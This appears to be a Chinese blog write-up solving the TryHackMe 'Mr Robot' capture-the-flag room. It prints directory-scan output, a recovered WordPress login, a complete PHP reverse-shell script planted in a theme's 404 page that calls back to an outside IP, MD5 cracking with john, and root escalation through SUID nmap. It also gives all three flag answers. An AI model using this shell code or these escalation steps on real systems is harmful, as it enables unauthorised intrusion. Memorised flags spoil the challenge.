THM-Mr Robot CTF

本文最后更新于 2025年1月22日 凌晨

Mr Robot CTF

nmap检测一下但是没找到什么有用信息,直接看网址80,没找到什么,简单的交互没什么用处。

用dirsearch扫一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
[21:23:55] 200 -    1KB - /admin/
[21:23:55] 403 -   224B - /admin/.htaccess
[21:24:01] 200 -    1KB - /admin/index
[21:24:01] 301 -     0B - /admin/index.php  ->  http://10.10.94.107/admin/
[21:24:02] 200 -    1KB - /admin/index.html
[21:29:03] 200 -     0B - /favicon.ico
[21:29:05] 301 -     0B - /feed  ->  http://10.10.94.107/feed/
[21:29:34] 301 -     0B - /html/js/misc/swfupload//swfupload.swf  ->  http://10.10.94.107/html/js/misc/swfupload/swfupload.swf
[21:29:39] 301 -     0B - /image  ->  http://10.10.94.107/image/
[21:29:40] 403 -   216B - /images/
[21:29:44] 301 -   235B - /images  ->  http://10.10.94.107/images/
[21:29:50] 301 -     0B - /index.php  ->  http://10.10.94.107/
[21:29:50] 200 -    1KB - /index.html
[21:33:12] 200 -    64B - /readme
[21:33:12] 200 -    64B - /readme.html
[21:33:27] 200 -    41B - /robots.txt
[21:33:27] 301 -     0B - /roundcube/index.php  ->  http://10.10.94.107/roundcube/
[21:33:28] 301 -     0B - /rss  ->  http://10.10.94.107/feed/
[21:34:11] 301 -     0B - /siteadmin/index.php  ->  http://10.10.94.107/siteadmin/
[21:34:13] 200 -     0B - /sitemap
[21:34:13] 200 -     0B - /sitemap.xml
[21:34:13] 200 -     0B - /sitemap.xml.gz
[21:36:26] 200 -     1B - /wp-admin/admin-ajax.php
[21:36:26] 302 -     0B - /wp-admin/  ->  http://10.10.94.107/wp-login.php?redirect_to=http%3A%2F%2F10.10.94.107%2Fwp-admin%2F&reauth=1
[21:36:26] 500 -    3KB - /wp-admin/setup-config.php
[21:36:26] 200 -     0B - /wp-config.php
[21:36:31] 301 -   239B - /wp-content  ->  http://10.10.94.107/wp-content/
[21:36:32] 403 -   247B - /wp-content/plugins/akismet/akismet.php
[21:36:32] 200 -     0B - /wp-content/
[21:36:32] 301 -     0B - /wp-content/plugins/adminer/inc/editor/index.php  ->  http://10.10.94.107/wp-content/plugins/adminer/inc/editor/
[21:36:33] 301 -   279B - /wp-content/plugins/all-in-one-wp-migration/storage  ->  http://10.10.94.107/wp-content/plugins/all-in-one-wp-migration/storage/
[21:36:33] 200 -     0B - /wp-content/plugins/google-sitemap-generator/sitemap-core.php
[21:36:33] 500 -     0B - /wp-content/plugins/hello.php
[21:36:33] 403 -   228B - /wp-content/uploads/
[21:36:33] 200 -     0B - /wp-content/themes/
[21:36:35] 200 -     0B - /wp-cron.php
[21:36:35] 403 -   221B - /wp-includes/
[21:36:35] 301 -   240B - /wp-includes  ->  http://10.10.94.107/wp-includes/
[21:36:35] 500 -     0B - /wp-includes/rss-functions.php
[21:36:35] 200 -    3KB - /wp-login/
[21:36:36] 200 -    3KB - /wp-login.php
[21:36:36] 301 -     0B - /wp-register.php  ->  http://10.10.94.107/wp-login.php?action=register
[21:36:36] 302 -     0B - /wp-signup.php  ->  http://10.10.94.107/wp-login.php?action=register
[21:36:39] 403 -   228B - /wp-content/upgrade/
[21:36:41] 301 -     0B - /www/phpMyAdmin/index.php  ->  http://10.10.94.107/www/phpMyAdmin/
[21:36:35] 200 -    3KB - /wp-login

分析一下可以知道是wordpress的cms,看一下robots.txt

1
2
3
4
http://10.10.94.107/robots.txt
User-agent: *
fsocity.dic
key-1-of-3.txt

What is key 1?

直接读取一下

1
073403c8a58a1f80d943455fb30724b9

What is key 2?

去licence看一下,里面有内容,看一下源码(也扫到了没贴上去),需要看f12看,藏在很后面。

1
2
3
what you do just pull code from Rapid9 or some s@#% since when did you become a script kitty?
do you want a password or something?
ZWxsaW90OkVSMjgtMDY1Mgo=

用base64解密elliot:ER28-0652

可以用这个来登录wp-login,进里面到editor里改一下404

进去wp后写个马(插入不要全删)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
<?php
set_time_limit (0);
$VERSION = "1.0";
$ip = '10.8.11.245';
$port = 5566;
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; sh -i';
$daemon = 0;
$debug = 0;

if (function_exists('pcntl_fork')) {
	$pid = pcntl_fork();
	
	if ($pid == -1) {
		printit("ERROR: Can't fork");
		exit(1);
	}
	
	if ($pid) {
		exit(0);  // Parent exits
	}
	if (posix_setsid() == -1) {
		printit("Error: Can't setsid()");
		exit(1);
	}

	$daemon = 1;
} else {
	printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}

chdir("/");

umask(0);

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
	printit("$errstr ($errno)");
	exit(1);
}

$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
	printit("ERROR: Can't spawn shell");
	exit(1);
}

stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
	if (feof($sock)) {
		printit("ERROR: Shell connection terminated");
		break;
	}

	if (feof($pipes[1])) {
		printit("ERROR: Shell process terminated");
		break;
	}

	$read_a = array($sock, $pipes[1], $pipes[2]);
	$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

	if (in_array($sock, $read_a)) {
		if ($debug) printit("SOCK READ");
		$input = fread($sock, $chunk_size);
		if ($debug) printit("SOCK: $input");
		fwrite($pipes[0], $input);
	}

	if (in_array($pipes[1], $read_a)) {
		if ($debug) printit("STDOUT READ");
		$input = fread($pipes[1], $chunk_size);
		if ($debug) printit("STDOUT: $input");
		fwrite($sock, $input);
	}

	if (in_array($pipes[2], $read_a)) {
		if ($debug) printit("STDERR READ");
		$input = fread($pipes[2], $chunk_size);
		if ($debug) printit("STDERR: $input");
		fwrite($sock, $input);
	}
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

function printit ($string) {
	if (!$daemon) {
		print "$string\n";
	}
}

?>

本地看端口,网页访问/404

1
2
3
4
5
6
7
$ cd /home
$ ls
robot 
$ cd robot
$ ls
key-2-of-3.txt
password.raw-md5

没有权限

1
2
3
4
$ whoami
daemon
$ sudo -l
sudo: no tty present and no askpass program specified
1
2
3
4
5
6
7
8
$ ls -al
total 16
drwxr-xr-x 2 root  root  4096 Nov 13  2015 .
drwxr-xr-x 3 root  root  4096 Nov 13  2015 ..
-r-------- 1 robot robot   33 Nov 13  2015 key-2-of-3.txt
-rw-r--r-- 1 robot robot   39 Nov 13  2015 password.raw-md5
$ cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(root㉿Coyano)-[~]
└─# echo 'c3fcd3d76192e4007dfb496cca67e13b' > hash.txt

┌──(root㉿Coyano)-[~]
└─# john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 512/512 AVX512BW 16x3])
Warning: no OpenMP support for this hash type, consider --fork=32
Press 'q' or Ctrl-C to abort, almost any other key for status
abcdefghijklmnopqrstuvwxyz (?)
1g 0:00:00:00 DONE (2025-01-21 22:32) 100.0g/s 4070Kp/s 4070Kc/s 4070KC/s power12..telcel
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed.

因此得到

1
2
username: robot
password: abcdefghijklmnopqrstuvwxyz

命令 find / -perm -4000 2>/dev/null 用于在 Linux 或类 Unix 系统上查找所有具有 setuid 权限的可执行文件。setuid 权限允许用户以文件所有者的权限执行该文件,而不是以文件本身的权限执行。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
$ find / -perm -4000 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown
1
2
$ su
su: must be run from a terminal
1
python -c 'import pty; pty.spawn("/bin/bash")' 是一个常用的 Python 命令,用于在受限的环境中通过 Python 脚本启动一个交互式 shell,通常用于反向 shell 或突破一些限制环境(如通过 SSH 登录到目标系统时)
1
2
3
4
5
6
daemon@linux:/home/robot$ su robot
su robot
Password: abcdefghijklmnopqrstuvwxyz
robot@linux:~$ cat key-2-of-3.txt
cat key-2-of-3.txt
822c73956184f694993bede3eb39f959

What is key 3?

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
robot@linux:/$ find / -perm -4000 2>/dev/null
find / -perm -4000 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown

看看nmap有什么作用

1
2
3
4
5
robot@linux:/usr/local/bin$ nmap --interactive
nmap --interactive

Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !ls
ls
Unknown command (!ls) -- press h <enter> for help
nmap> !ls
!ls
nmap
waiting to reap child : No child processes
nmap> !root
!root
sh: 1: root: not found
waiting to reap child : No child processes
nmap> !ls /root
!ls /root
firstboot_done  key-3-of-3.txt
waiting to reap child : No child processes
nmap> !cat /root/key-3-of-3.txt
!cat /root/key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4
waiting to reap child : No child processes

老版本的nmap --internative可以交互读取,类似可以参照vim。

渗透
#提权 #wordpress
THM-Mr Robot CTF
https://0ran9ewww.github.io/2025/01/21/渗透/Mr Robot CTF/
作者
orange
发布于
2025年1月21日
更新于
2025年1月22日
许可协议